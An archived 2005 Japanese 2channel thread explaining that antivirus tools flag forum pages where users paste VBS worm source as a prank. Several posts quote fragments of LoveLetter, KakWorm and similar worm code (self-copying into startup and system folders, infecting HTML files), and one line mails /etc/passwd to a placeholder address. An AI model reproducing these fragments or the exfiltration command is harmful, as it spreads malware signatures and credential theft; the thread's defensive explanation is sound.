[過去ログ] ノートンがvbsウィルスのソースに誤反応3 (1002レス)
上下前次1-新
このスレッドは過去ログ倉庫に格納されています。
次スレ検索 歴削→次スレ 栞削→次スレ 過去ログメニュー
1(15): 他のアンチウィルスソフトが反応する場合もあります 05/03/01 01:58 ID:??? AAS
只今2chでvbsのウィルスのソースを貼りノートンなどのセキュリティツールを誤反応させるのが流行っています。
あまりにも質問スレなどで既出の(このvbsの)質問が多すぎるのでこのスレへURLを貼って誘導してください。
また新たなパターンのvbsが見つかったら一応このスレで報告願えると幸いです。
■この問題について■
2chのスレにvbsウィルスのソースを書き込むことによってブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたとノートン先生などが騒ぎます。(設定によっては反応しないこともありますが、全く問題ありません)
ご存知の通り、htmlを読んでもこのvbsのソースは実行されることは無いので、全く問題ありません。
また、デフォルトだとIEはInternet Temporary Filesフォルダにhtmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。
これらのファイルは削除しても全く問題ありませんが、該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされてしまうので警告が出ます。
■まとめと対策■
省12
2(3): 05/03/01 01:59 ID:??? AAS
■既知のvbsウィルスのソース■
・VBS.Internal
出元は2chスレ:downloadだと思われる。
ダウソ板からいろんな板へ飛び火した模様。
・VBS.LoveLetter.A
c.Copy(dirsystem&”LOVE−LETTER−FOR−YOU.TXT.vbs
(反応しないように全角で書いてあります)出元不明。ニュー速から?
一般論として「htm」「html」拡張子などを安易に検索対象から外すことは奨励されません。これを感染ターゲットにするウィルスが数種確認されています。
外部リンク[html]:www.symantec.com
Q.ウイルスコードが貼られているのにノートン反応しない。。。
省7
3: 05/03/01 01:59 ID:??? AAS
AA省
4(9): 05/03/01 02:00 ID:??? AAS
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
< => <
> => >
& => &
" => "
それぞれしっかり置換されていれば反応しない、ここの掲示板の問題。
ノートンが反応するのは、ここの掲示板(2Ch)の仕様なので気にする必要なし。
ここは、時に他のウィルス対策ソフトが反応する場合もある。
省12
5(2): 05/03/01 02:05 ID:??? AAS
補足ありましたらお願いします。
6: 05/03/01 02:06 ID:??? AAS
ニャンです
7(4): 05/03/01 18:00 ID:??? AAS
Q.2ちゃんねるの板開いただけで反応します。
A.スレッドタイトルにウイルスコードが貼られていることがあり、それに反応しています。
2ちゃんねるブラウザの場合、ログ保存フォルダの他にスレタイ・既読スレ履歴等を保存しているファイルやフォルダを除外。
各2ちゃんねるブラウザによってスレタイ・既読スレ履歴等を保存しているファイルやフォルダが異なるようなので
特定のドライブ、フォルダ、ファイルをウイルススキャンの対象から除外する方法
外部リンク:service1.symantec.com
↑を参考にお使いの2ちゃんねるブラウザのスレでお聞きください。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。
外部リンク[php]:info.2ch.net
8: 05/03/02 00:36 ID:??? AAS
その他リンク@2ちゃんねる検索
エロサイト見たら…助けて下さい!
外部リンク:find.2ch.net
パソコン初心者総合質問スレッド
外部リンク:find.2ch.net
セキュリティ初心者質問スレッド
外部リンク:find.2ch.net
9: 05/03/03 00:26 ID:??? AAS
AA省
10(7): 05/03/03 01:13 ID:??? AAS
2ちゃんねるに貼られたウイルスコードに誤反応していたことがわかったら
インターネットエクスプローラの場合
ツール→インターネットオプション→インターネット一時ファイル、ファイルの削除
これをしないでウイルススキャンしたらインターネット一時ファイル(Temporary Internet Filesフォルダ)でウイルス反応がでます。
また、該当レスを再び読み込むとウイルス反応がでます。
2ちゃんねるブラウザを使って以下の設定をして2ちゃんねるを見ましょう。
2ちゃんねるブラウザの場合
2ちゃんねる専用ブラウザでノートンを使うと今まで取得したログが抹消されてしまい、スレを再表示した時全てが新しいレスになってしまいます、どうすれば解決できるでしょうか?
外部リンク[php]:info.2ch.net
2chブラウザのログ保存フォルダを「除外」に設定。
省1
11(4): 05/03/03 02:43 ID:7F9C8/Th(1) AAS
よろ
kak.hta';ken=wdt'START
ms-its:mhtml:file://c:\
12(4): 05/03/03 18:20 ID:??? AAS
>>11
既出。
Wscript.KakWorm
2chスレ:pcqa
Bloodhound.Exploit.6
2chスレ:pcqa
13(2): 05/03/04 01:48 ID:hGA62fOr(1) AAS
外部リンク:c-au.2ch.net
このウイルスを解説してください
14(4): 05/03/04 22:18 ID:??? AAS
DAT落ち阻止て神戸♪
>>13
VBS.LoveLetter.Var
2chスレ:pcqa
ウイルスコードが貼られているのにノートン反応しないって人は>>2見てね。
15(3): 05/03/05 00:21 ID:hfT/sPqY(1) AAS
ありがとう
しかしラブレター1個だけではないはず。
カーネルやネットワークも入っている。
一つ一つ解説してください。
16(8): 05/03/05 19:06 ID:5lPM1YuQ(1) AAS
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
↑こういうのって最初に気づいた奴って天才だよな
17(18): cen ◆Pm9xOTJuM. NG NG AAS
あ。そうそう。
>>16 みたいなスクリプトを誤反応しないような、datファイルに
datを作り変えるプログラム作ってみました。
よかったら使ってみてください。
外部リンク[html]:www.geocities.jp
18(3): 05/03/05 22:58 ID:??? AAS
あやすい・・・・・
19(7): cen ◆Pm9xOTJuM. NG NG AAS
>>18
自分のパソコンで何度も実行してますが、大丈夫ですよー。
さっき総質で見た、未対応のスクリプトに対応させました。
20(1): 名無しさん@お腹いぱーい。 NG NG AAS
>>17,19
ご支援ありがとうございます。
外部リンク:ansitu.xrea.jp
上下前次1-新書関写板覧索設栞歴
あと 982 レスあります
スレ情報 赤レス抽出 画像レス抽出 歴の未読スレ AAサムネイル
ぬこの手 ぬこTOP 0.029s